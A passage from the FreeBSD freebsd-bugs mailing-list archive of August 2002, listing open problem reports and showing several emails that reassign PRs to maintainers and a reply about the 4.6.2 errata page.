[2002/07/25] ports/40981 ports mc does not work as viewer o [2002/07/26] ports/41000 ports net/ppxp: fix to build with the latest xf o [2002/07/26] kern/41010 HP 315 Digital camera, SCSI quirks o [2002/07/26] bin/41012 /etc/periodic/daily/440.status-mailq assu o [2002/07/26] ports/41016 ports Update Port astro/ksetiwatch o [2002/07/26] ports/41017 ports Updated port audio/id3lib o [2002/07/26] ports/41018 ports 'screen' binary eats CPU on 4.6-RELEASE , o [2002/07/26] ports/41019 ports New Port: audio/kmp3indexer generates an o [2002/07/26] ports/41022 ports New Port: graphics/kmencoder A mencoder F o [2002/07/26] docs/41034 doc [PATCH] Typos in /etc/named/named.conf co o [2002/07/27] ports/41036 ports New port: x11-wm/wmDeskGuide, a dockbar p o [2002/07/27] ports/41040 ports Unbreak devel/crystal (problem with nasm o [2002/07/27] ports/41042 trevor Change print/acroread5 ln's command to -s o [2002/07/27] standards/41043ache Incorrect date format in Swedish locale. o [2002/07/27] docs/41049 doc [PATCH] cleanup of elements o [2002/07/27] ports/41051 ports Update port: lang/ghc - avoid problems wi o [2002/07/27] ports/41055 ports New Port: audio/swhplugins A huge collect o [2002/07/27] ports/41056 pat Apply -pedantic fix and user-smubmitted p o [2002/07/27] bin/41060 ready to import gzip 1.3.3 o [2002/07/27] ports/41061 ports New port: archivers/gzip (1.3.3) o [2002/07/27] kern/41063 sos Typo f [2002/07/27] misc/41064 can't make world: ===> share/doc/papers/k o [2002/07/27] ports/41066 ports update port: print/ttf2pt1 to 3.4.1 o [2002/07/27] bin/41070 jmallett added .warning in make(1) + two fixes o [2002/07/27] bin/41071 make NO to NO_ transition patch o [2002/07/28] kern/41081 Add USB device ID for USB Flash disk driv o [2002/07/28] ports/41082 ports New port: emulators/dosbox - emulator of o [2002/07/28] ports/41084 ports New Ports / archivers/untar o [2002/07/28] docs/41089 doc pax -B option does not mention interactio o [2002/07/28] ports/41092 ports patch: unbreak devel/zziplib o [2002/07/28] ports/41097 anders patch: fix graphics/xmms-xvs o [2002/07/28] ports/41101 ports patch: fix editors/xed o [2002/07/28] docs/41104 imp Stale comment removal from pccardd(8) o [2002/07/28] ports/41105 ports New port: graphics/renderpark System for o [2002/07/29] docs/41106 seth FreeBSD Handbook lacks "Desktop Applicati o [2002/07/29] misc/41107 file(1) command shows incorrect data (sig o [2002/07/29] docs/41109 trhodes Handbook lacks IPv6 information o [2002/07/29] docs/41110 doc "apropos linux" doesn't find brandelf o [2002/07/29] ports/41124 wjv www/phpbb 2.0.0 -> 2.0.1 up o [2002/07/29] ports/41131 dirk adding some more configuration parameters o [2002/07/29] ports/41133 naddy New port: french/plgrenouille (0.61.3) o [2002/07/29] ports/41134 ports [New Port] lang/pike72cvs - Pike 7.2.380 o [2002/07/29] kern/41142 patch: add 2 port serial card to PUC driv o [2002/07/29] bin/41143 schweikh termcap entry incorrect for XFree86 xterm o [2002/07/29] kern/41146 patch: add 4 port serial card to PUC driv o [2002/07/29] misc/41149 doc fix lukemftpd man page: /etc/nologin -> / o [2002/07/30] ports/41150 ports new port: astro/setistat o [2002/07/30] ports/41151 portmgr [MAINTAINER UPDATE] databases/firebird da o [2002/07/30] ports/41156 dirk Port Update: www/mod_php4: Patch to scrip o [2002/07/30] bin/41159 new sed -c option to allow ; as a separat o [2002/07/30] docs/41166 doc man page for smp(4) is short on details o [2002/07/30] docs/41167 doc adventure.6 man-page, add section AUTHORS o [2002/07/30] misc/41179 LD_LIBRARY_PATH security checks o [2002/07/30] docs/41181 doc Poor grammar in the dialog manpage o [2002/07/30] bin/41190 in sed, report the { linenum instead of E o [2002/07/30] ports/41195 adrian Update port: www/squid24 - add a master s o [2002/07/31] misc/41202 Upgrade to 4.6.1-RELEASE-p3 breaks remote o [2002/07/31] ports/41209 gnome www/mozilla browser serializes DNS lookup o [2002/07/31] ports/41211 ports New port textproc/spellutils: newsbody & o [2002/07/31] misc/41213 top(1) blocks if NIS-related entries in p o [2002/07/31] misc/41215 console revert back to kbd0 (AT) after KV o [2002/07/31] ports/41219 portmgr Mk/bsd.sites.mk - add Apache master sites o [2002/07/31] pending/41220gnats-admin[PATCH] Minor sk driver enhancements o [2002/07/31] ports/41224 dburr update port: textproc/yodl o [2002/08/01] ports/41228 ports New port: devel/aegis o [2002/08/01] ports/41229 ports New port: devel/aegis-mode.el o [2002/08/01] ports/41231 ports lang/ghc/Makefile: no-profile patch o [2002/08/01] ports/41232 naddy UPDATE: mail/gkrellmmailwatch 0.7.2 o [2002/08/01] misc/41238 problems with FreeBSD installation on a d o [2002/08/01] conf/41241 sysinstall build uses kbdcontrol keymaps o [2002/08/01] misc/41243 USB, getting full desc failed, HID device o [2002/08/01] docs/41244 doc "Backup" info needs reworking o [2002/08/01] docs/41253 doc config(8) and/or Handbook deficiency o [2002/08/02] ports/41257 sobomax unbreak build of x11-toolkits/xenostep f [2002/08/02] ports/41258 ports converters/recode needs new port revision o [2002/08/02] ports/41259 ports Info directory change for various GNU Ema o [2002/08/02] docs/41263 doc [PATCH] Clarifications and minor grammer o [2002/08/02] ports/41265 ports New port: textproc/p5-Text-Reflow o [2002/08/02] pending/41270gnats-adminconfusing directions for kernelconfig cha o [2002/08/02] bin/41271 Non-suid-crontab. o [2002/08/03] ports/41280 sobomax update-port: audio/extace (unbroke) o [2002/08/03] kern/41281 USB scanning works only once o [2002/08/03] ports/41282 ports New_Ports japanese/stevie-* o [2002/08/03] docs/41286 doc [PATCH] missing in books o [2002/08/03] docs/41290 doc [PATCH] wrong size for XEmpty-Deltas in m o [2002/08/04] ports/41305 ports Portupgrade and misc/kde3-i18n o [2002/08/04] www/41306 www 17.2.2 in manual has wrong IP in an examp o [2002/08/04] bin/41307 libalias: logging of links lifecycle (add o [2002/08/04] ports/41308 ports New port: devel/p5-Log-Agent-Logger o [2002/08/04] misc/41309 security check scripts do not delete temp o [2002/08/04] bin/41310 Added ,,-d'' option to truss(1) for chang o [2002/08/04] www/41312 scop RCS IDs are off-by-one in the NetBSD cvsw o [2002/08/04] ports/41314 ports amavis-perl is outdated (no longer suppor o [2002/08/04] kern/41317 reflect kernel building user for sudo-ers o [2002/08/04] ports/41320 ports New port : security/libprelude (part of P o [2002/08/04] ports/41321 ports New port : security/prelude-manager (part o [2002/08/04] ports/41324 ports New port : security/prelude-lml (part of o [2002/08/04] ports/41325 ports New port : security/prelude-nids (part of o [2002/08/04] misc/41328 ssh logins in 4.6.1 no longer give incomi o [2002/08/04] docs/41329 doc return value in man page for kldunload is o [2002/08/04] ports/41333 scrappy updates the net/p5-perl-ldap port o [2002/08/04] ports/41334 naddy update: audio/gkrellmss 0.3 -> 0.5 o [2002/08/04] i386/41337 Compaq 900T syncs too high or incorrectly o [2002/08/05] misc/41338 make buildworld dependencies potentially o [2002/08/05] ports/41339 mi Fix: textproc/wordnet/scripts/configure o [2002/08/05] java/41340 glewis install of jdk 1.3 o [2002/08/05] bin/41341 "-vv" (very verbose) flag for chown o [2002/08/05] ports/41345 ijliao Centericq's port erroneously download unn o [2002/08/05] ports/41353 ache Update port: archivers/unrar to 3.00 o [2002/08/05] ports/41355 ports Update port: cad/qcad to 1.5.1 o [2002/08/05] ports/41356 ports Update port: graphics/libexif to 0.5.4 o [2002/08/05] ports/41357 sobomax Update port: graphics/jasper to 1.500.4 o [2002/08/05] ports/41362 ports Update port: x11-wm/e16utils o [2002/08/06] kern/41375 [PATCH] Add support for Hewlett Packard S o [2002/08/06] ports/41377 ports New version of lang/clisp f [2002/08/06] misc/41379 Cannot browse directory tree on FreeBSD m o [2002/08/06] ports/41380 ports New Port: databases/hk_classes: C++ libra o [2002/08/06] ports/41381 ports New Ports: databases/knoda: A KDE3 Databa o [2002/08/06] ports/41383 knu portupgrade uses old dependencies when re o [2002/08/06] ports/41390 netchild New port: www/interchange o [2002/08/07] misc/41397 no copyright or license on lib/libc/gen/s f [2002/08/07] i386/41398 Illegal instruction Core Dumped o [2002/08/07] ports/41400 ports sgmltools-lite update to 3.0.3 o [2002/08/07] ports/41401 ports security/pam-pgsql does not work on RELEN o [2002/08/07] www/41404 www Problems install apache 1.3.22 on FreeBSD p [2002/08/07] ports/41409 knu portupgrade broken with the change from . o [2002/08/07] docs/41413 doc [PATCH] Update to current projects page o [2002/08/07] kern/41415 Some USB scanner cannot talk to uscanner o [2002/08/07] docs/41420 doc [PATCH] Update to FAQ (Funny part) o [2002/08/07] ports/41422 ports New_Ports: japanese/xvi-{euc|sjis} o [2002/08/07] docs/41423 doc Update FAQ: attrib command for windows du f [2002/08/07] ports/41428 ade autoconf213 requires nawk o [2002/08/07] ports/41434 ports New port: www/light: another Mozilla-base o [2002/08/07] ports/41436 ports net/spread did not build the shared libs o [2002/08/08] ports/41439 ports [MAINTAINER UPDATE] security/fwbuilder -> o [2002/08/08] ports/41440 ports [MAINTAINER UPDATE] security/libfwbuilder o [2002/08/08] ports/41444 portmgr ports system fails to check for non-base o [2002/08/08] ports/41448 ports Update misc/mango to version 0.17 (SUPERC o [2002/08/08] docs/41449 doc [PATCH] Missing word in DNS info in Handb o [2002/08/08] ports/41450 ports New port: hu-ispell 0.86 (Hungarian spell f [2002/08/08] ports/41458 dinoex sendmail port post-install messages wrong o [2002/08/08] ports/41461 ports New port: graphics/irit Solid modelling s o [2002/08/08] ports/41462 keith Update port: chinese/CJK o [2002/08/09] ports/41464 ports New port Cybercalendar 1.8.2: web based c o [2002/08/09] kern/41466 Add support for 82801 MCH UP only SKU to o [2002/08/09] ports/41468 kuriyama xhtml port needs to be updated for XHTML o [2002/08/09] www/41471 www FreeBSD Website still talking about _DEC_ o [2002/08/09] ports/41474 ports New port: tcpreen 0.9.4 - tcp session mon o [2002/08/09] ports/41476 ports textproc/par MASTER_SITES update o [2002/08/09] ports/41479 ports maintainer update: graphics/transcode to o [2002/08/09] ports/41480 ports New port: whatpix / a perl apps to find, o [2002/08/09] bin/41486 watch(8) trapping with `fatal: malloc fai o [2002/08/09] kern/41489 nge(4) works as a module, but fails when f [2002/08/09] misc/41490 C-Media 8738 sound card static o [2002/08/09] i386/41495 panic: timeout table full when installing o [2002/08/09] docs/41497 doc Problems in /usr/local/man/man1/procmail. o [2002/08/09] ports/41501 lioux Update port: graphics/libdv o [2002/08/09] ports/41508 hoek Update port: converters/uudeview|converte o [2002/08/09] ports/41509 ports keychain does not work after parser.c of o [2002/08/09] ports/41510 ports New port: graphics/i3d 3D modeling progra o [2002/08/10] misc/41515 boot0cfg corrupts slice table o [2002/08/10] misc/41523 [PATCH] Remove perl from 440.status-mailq o [2002/08/10] www/41524 www 'GET' and 'POST' Problem with PHP 4.2.2 o [2002/08/10] bin/41526 symlinked mount points get mounted more t o [2002/08/10] i386/41528 better stack alignment patch for lib/csu/ o [2002/08/10] docs/41532 doc [PATCH] Two small fixes to books/design-4 o [2002/08/10] docs/41534 blackend [PATCH] Various fixes to books/porters-ha o [2002/08/10] ports/41535 ports chinese/xcin2.5: it may build fail on som o [2002/08/11] ports/41537 ports Quanta+ 3.0 PR1 have been released o [2002/08/11] conf/41540 [PATCH] dual stack support for lukemftpd o [2002/08/11] ports/41541 ports Updated Port net/mutella 0.3.3 -> 0.4.1 o [2002/08/11] kern/41543 Easier wine/w23 support o [2002/08/11] docs/41546 doc [PATCH] adding non-breaking spaces to the o [2002/08/11] ports/41547 ports ymessenger 0.93.0 no longer functions o [2002/08/11] ports/41553 ports knapster KDE3 update o [2002/08/11] kern/41555 Add support of VScom titan PCI-800L o [2002/08/11] bin/41556 [PATCH] wtmp patch for lukemftpd f [2002/08/11] ports/41558 knu Portupgrade is not reinstalling correctly o [2002/08/11] ports/41562 ports New port: inform-glk o [2002/08/11] ports/41565 ports Port Fix: devel/objprelink o [2002/08/11] misc/41566 obrien file(1) out of date o [2002/08/11] ports/41571 ports japanese/emacs20-emcws doesn't install wi o [2002/08/12] ports/41572 ports update www/p5-HTML-Mason f [2002/08/12] ports/41573 ports Pb with 'make install' with mozilla -> ge o [2002/08/12] ports/41574 ports Update port: devel/hmake -> 3.06 p [2002/08/12] standards/41576standardsPOSIX compliance of ln(1) o [2002/08/12] ports/41577 ports port security/acid won't see apache2+mod_ o [2002/08/12] docs/41578 doc Incorrect #include in the usb(4) manpage o [2002/08/12] ports/41579 ports New port: Small LDAP-to-KAB (KDE Address o [2002/08/12] docs/41580 doc usb(4) manpage: Structures' fields aren't o [2002/08/12] ports/41581 ports *MAINTAINER UPDATE* Ecartis (ports/mail/e o [2002/08/12] ports/41582 ports [PORT] (X)MedCon: A medical image convers a [2002/08/12] bin/41583 assorted mtree bugs (+fixes) o [2002/08/12] ports/41585 ports New Port: Krusader, A two window file man p [2002/08/12] docs/41587 bmah A few fixes for the supported hardware li o [2002/08/12] ports/41591 ports update math/grace to 5.1.9 o [2002/08/12] ports/41592 ports Fix for misc/projectionlib o [2002/08/12] ports/41593 ports [MAINTAINER UPDATE] lang/tensile 0.9p7 -> o [2002/08/12] ports/41596 nobutaka libxine esound removal o [2002/08/12] ports/41597 ports New Port: mail/dovecot o [2002/08/12] ports/41599 ports security/cyrus-sasl2 uses install -C -d ( o [2002/08/12] ports/41601 ports New port: graphics/gltt TrueType fonts re o [2002/08/13] ports/41603 ports Upgrade port: net/flow-tools o [2002/08/13] ports/41604 ports [patch] allow games/heretic to use SDL o [2002/08/13] ports/41605 trevor Acrobat Reader 5 port doesn't start o [2002/08/13] ports/41606 anholt x11/XFree86-4 metaport: if make target is o [2002/08/13] kern/41609 luigi ipwf prints error without telling the sou o [2002/08/13] ports/41610 znerd New Port: mod_webapp o [2002/08/13] ports/41613 dirk PHP binaire cannot be build o [2002/08/13] ports/41614 ports Update of cad/linux-eagle to 4.09r2 o [2002/08/13] ports/41616 ports New port: devel/drift (A type sensitive p o [2002/08/13] ports/41617 ports new port for gtkglarea2 for gnome2 o [2002/08/13] ports/41618 ports Update port: [Maintainer update]: irc/pis o [2002/08/13] ports/41619 ports New port x11-toolkits/SoQt (1.0.1) o [2002/08/13] ports/41620 ports new port: py-gtk2 o [2002/08/13] ports/41623 ports Update mail/fetchmail to 5.9.13 o [2002/08/13] ports/41625 ports New port: misc/spamcalc o [2002/08/13] ports/41626 ports [Maintainer-Update] ftp/kbear 2.0.b.1 -> o [2002/08/13] ports/41629 ports [MAINTAINER UPDATE] Update port: lang/nhc o [2002/08/13] kern/41631 PATCH to add sysctl knob to disable clone o [2002/08/13] ports/41633 petef Port Update: devel/libevent o [2002/08/13] ports/41638 ports New Port: devel/libio o [2002/08/13] ports/41640 gnats-adminupdate editors/flim to 1.14.4 o [2002/08/13] ports/41641 ports Update port: mail/mimedefang from 2.16 to o [2002/08/13] docs/41643 doc New FAQ entry explaining UDMA ICRC errors o [2002/08/13] ports/41650 ports Intel fortran compiler doesn't install co o [2002/08/14] ports/41655 ports Update port: net/staticcharge o [2002/08/14] docs/41661 doc [PATCH] minor correction of vinum/chapter o [2002/08/14] ports/41667 ports [MAINTAINER UPDATE] Update port: textproc o [2002/08/14] ports/41672 ports New port: mail/pymsgauth o [2002/08/14] ports/41673 ports New port: igal, image gallery generator o [2002/08/14] misc/41674 iostat column formatting overlaps o [2002/08/14] ports/41675 sobomax update port: ftp/ftpcopy -> 0.5.1 o [2002/08/14] ports/41678 ports New port: xfwm4 is a gtk2 WM ideal for us o [2002/08/15] ports/41680 ports print/ghostscript-gnu-cjk ports remove o [2002/08/15] ports/41685 portmgr many packages missing on ftp o [2002/08/15] ports/41686 ports New port: x11-wm/qinx QNX-alike theme/sty o [2002/08/15] ports/41687 deischen [patch] nedit to use INSTALL_{PROGRAM,MAN o [2002/08/15] bin/41689 libc lacks RFC 3152 compliance (patch inc o [2002/08/15] conf/41691 Combining WLAN-SSID & DHCP in rc.conf o [2002/08/15] ports/41692 ports new port: net/nsd o [2002/08/15] ports/41693 ports New port: games/pinball - an OpenGL pinba o [2002/08/15] ports/41694 mbr add using command line options for ports/ o [2002/08/15] ports/41695 ports Update port: security/amavisd o [2002/08/15] ports/41696 ports [MAINTAINER PATCH] ports/mail/elm 2.5.5 t o [2002/08/15] ports/41701 ports New port: devel/RT2 o [2002/08/16] docs/41703 doc tcpdump manual mistake, with a draft amen o [2002/08/16] ports/41706 ports New port: x11-wm/mkultra (KDE3 window dec o [2002/08/16] ports/41708 ports Build of devel/cook fails o [2002/08/16] ports/41709 ports New port: graphics/povray35 f [2002/08/16] misc/41711 setup uses a to small disk o [2002/08/16] ports/41713 ports maintainer-update of security/nessus-plug o [2002/08/16] ports/41718 ports New port: dwatch - A daemon watcher o [2002/08/16] ports/41719 ports field positions of output are one charact a [2002/08/16] docs/41727 doc a type in 'info send-pr' a [2002/08/16] docs/41728 doc a typo in grep.1 o [2002/08/16] ports/41729 sobomax Update port: archivers/cabextract to 0.6 o [2002/08/16] ports/41733 ports Update port: devel/ecgi o [2002/08/16] ports/41736 ports Update port: math/topaz to 3.35 o [2002/08/16] ports/41739 ports postgresql-odbc support for unixodbc [PAT o [2002/08/17] i386/41743 No sound from SiS630s controller o [2002/08/17] misc/41744 qa Cannot stop comat22 from being extracted o [2002/08/17] kern/41747 quake won't play sound with newpcm driver o [2002/08/17] docs/41749 ports version number in dhid pkg-descr file nee o [2002/08/17] ports/41752 ports error compiling libmcrypt on k6-processor o [2002/08/17] ports/41754 ports Patch XFCE for GNOME apps in menu and fix o [2002/08/17] ports/41755 ports Wrong letters in Canna iroha dictionary o o [2002/08/18] ports/41756 ports Patch to sysutils/ucspi-tcp to add manpag o [2002/08/18] docs/41758 doc Update for www/en/internal o [2002/08/18] docs/41759 doc Various fixes for fxp(4) o [2002/08/18] docs/41760 doc Updates for the supported hardware list: o [2002/08/18] docs/41761 doc Update for /ru/internal/ part of site o [2002/08/18] ports/41762 ports Update: japanese/eb, japanese/eb2 o [2002/08/18] ports/41763 ports [walkthrough] fixing security/acid port o [2002/08/18] ports/41766 ports WDM port breaks while doing 'make install o [2002/08/18] ports/41768 ports Feature request: WITHOUT_SHELL for Nethac o [2002/08/18] bin/41769 sysinstall fails to enter timezone menu o [2002/08/18] misc/41771 '/etc/ttys' and X o [2002/08/18] misc/41772 can't disable keybell o [2002/08/19] ports/41773 ports new port: x11-servers/Mozdev-PrintServer o [2002/08/19] ports/41774 jeh amanda-server fails to build o [2002/08/19] ports/41775 ports fix port: x11-fonts/webfonts o [2002/08/19] docs/41779 doc [PATCH] Fixes and additions for handbook/ o [2002/08/19] ports/41780 gnome gnucash doesn't build. o [2002/08/19] kern/41781 clock_getres returns tv_nsec=0 when TSC i o [2002/08/19] ports/41782 ports japanese/samba/pkg-descr has typo o [2002/08/19] ports/41784 ports vmware2 causes panic on recent -current o [2002/08/19] ports/41785 ports [New Port]: libfirestring o [2002/08/19] ports/41786 ports New Port: libfiredns o [2002/08/19] docs/41787 doc man page for route (Section 8) missing de 2548 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 11: 7:30 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C6FB037B401; Mon, 19 Aug 2002 11:07:28 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 26E4D43E6E; Mon, 19 Aug 2002 11:07:28 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JI7SJU015801; Mon, 19 Aug 2002 11:07:28 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JI7QsG015796; Mon, 19 Aug 2002 11:07:26 -0700 (PDT) Date: Mon, 19 Aug 2002 11:07:26 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191807.g7JI7QsG015796@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, dougb@FreeBSD.org Subject: Re: conf/24515: Fix for find(1) warning in /etc/rc Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Fix for find(1) warning in /etc/rc Responsible-Changed-From-To: freebsd-bugs->dougb Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 11:06:51 PDT 2002 Responsible-Changed-Why: Doug is look at rc stuff. http://www.freebsd.org/cgi/query-pr.cgi?pr=24515 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 11:26:18 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4BD6137B400 for ; Mon, 19 Aug 2002 11:26:15 -0700 (PDT) Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7273643E70 for ; Mon, 19 Aug 2002 11:26:14 -0700 (PDT) (envelope-from bmah@employees.org) Received: from bmah.dyndns.org ([12.233.149.189]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020819182614.CNCW1186.rwcrmhc52.attbi.com@bmah.dyndns.org>; Mon, 19 Aug 2002 18:26:14 +0000 Received: from intruder.bmah.org (localhost [IPv6:::1]) by bmah.dyndns.org (8.12.5/8.12.5) with ESMTP id g7JIQD89087747; Mon, 19 Aug 2002 11:26:13 -0700 (PDT) (envelope-from bmah@intruder.bmah.org) Received: (from bmah@localhost) by intruder.bmah.org (8.12.5/8.12.5/Submit) id g7JIQDGY087746; Mon, 19 Aug 2002 11:26:13 -0700 (PDT) Message-Id: <200208191826.g7JIQDGY087746@intruder.bmah.org> X-Mailer: exmh version 2.5+ 20020729 with nmh-1.0.4 To: Robin Carey Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: http://www.freebsd.org/releases/4.6.2R/errata.html In-Reply-To: References: Comments: In-reply-to Robin Carey message dated "Mon, 19 Aug 2002 10:55:54 -0700." From: bmah@acm.org (Bruce A. Mah) Reply-To: bmah@acm.org X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_1879566761P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Mon, 19 Aug 2002 11:26:13 -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --==_Exmh_1879566761P Content-Type: text/plain; charset=us-ascii If memory serves me right, Robin Carey wrote: > It looks like somebody has swapped 4.6R errata for 4.6.2 ... There is a single errata file that deals with both 4.6 and 4.6.2. (Rather, both files on the Web site contain the same content.) This is implied by the title ("FreeBSD 4.6-RELEASE/4.6.2-RELEASE Errata") and specifically mentioned in the abstract. Bruce. --==_Exmh_1879566761P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Exmh version 2.5+ 20020506 iD8DBQE9YThF2MoxcVugUsMRApK6AJ97HMvaupIWMvX6cukC6WeYIBn16wCgpL4o rnvWQ6+caTviQHNNYnEVhDA= =JqNo -----END PGP SIGNATURE----- --==_Exmh_1879566761P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 11:45:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 93CA537B400; Mon, 19 Aug 2002 11:45:10 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 438A543E6A; Mon, 19 Aug 2002 11:45:10 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JIjAJU023642; Mon, 19 Aug 2002 11:45:10 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JIjAac023638; Mon, 19 Aug 2002 11:45:10 -0700 (PDT) Date: Mon, 19 Aug 2002 11:45:10 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191845.g7JIjAac023638@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, darrenr@FreeBSD.org Subject: Re: misc/26879: mkfilter not installed, yet referred to via man ipf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: mkfilter not installed, yet referred to via man ipf Responsible-Changed-From-To: freebsd-bugs->darrenr Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 11:44:18 PDT 2002 Responsible-Changed-Why: Over to ipfilter maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=26879 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 11:46:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A328637B400; Mon, 19 Aug 2002 11:46:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5254343E42; Mon, 19 Aug 2002 11:46:07 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JIk7JU023769; Mon, 19 Aug 2002 11:46:07 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JIk7W1023765; Mon, 19 Aug 2002 11:46:07 -0700 (PDT) Date: Mon, 19 Aug 2002 11:46:07 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191846.g7JIk7W1023765@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: misc/25984: bsd.prog.mk doesn't link C++ programs properly Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: bsd.prog.mk doesn't link C++ programs properly Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 11:45:39 PDT 2002 Responsible-Changed-Why: Over to bsd.*.mk maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=25984 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 11:52:41 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F0A6B37B400; Mon, 19 Aug 2002 11:52:38 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A083243E6A; Mon, 19 Aug 2002 11:52:38 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JIqcJU025655; Mon, 19 Aug 2002 11:52:38 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JIqclo025651; Mon, 19 Aug 2002 11:52:38 -0700 (PDT) Date: Mon, 19 Aug 2002 11:52:38 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191852.g7JIqclo025651@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-standards@FreeBSD.org Subject: Re: misc/24590: timezone function not compatible witn Single Unix Spec v2 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: timezone function not compatible witn Single Unix Spec v2 Responsible-Changed-From-To: freebsd-bugs->freebsd-standards Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 11:52:14 PDT 2002 Responsible-Changed-Why: -standards issue. http://www.freebsd.org/cgi/query-pr.cgi?pr=24590 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 11:57:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org 